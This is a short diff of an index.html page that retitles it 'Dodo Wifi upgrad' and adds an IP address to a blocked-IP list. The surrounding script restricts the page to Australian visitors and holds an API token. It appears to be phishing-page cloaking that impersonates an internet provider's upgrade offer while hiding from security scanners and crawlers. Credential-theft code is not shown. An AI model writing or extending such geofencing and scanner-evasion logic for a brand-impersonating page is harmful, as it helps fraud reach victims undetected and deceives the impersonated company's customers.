--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <title>Wifi upgrad</title>
+  <title>Dodo Wifi upgrad</title>
   <script>
     const allowedCountry = 'AU';
     const token = "3a5e08c892d837";
@@ -22,7 +22,7 @@ const blockedIPs = [
   "82.102.31.156", "85.208.139.205", "85.254.40.226", "89.248.171.", "89.248.171.xxx",
   "96.0.0.81", "142.252.248.249", "38.18.1.205", "52.167.144.20", "91.242.215.81",
   "54.156.251.192", "34.235.48.77", "66.203.112.71", "104.164.216.68", "91.242.215.90",
-  "91.242.215.77",
+  "91.242.215.77", "199.203.206.147",
   
 ];
 
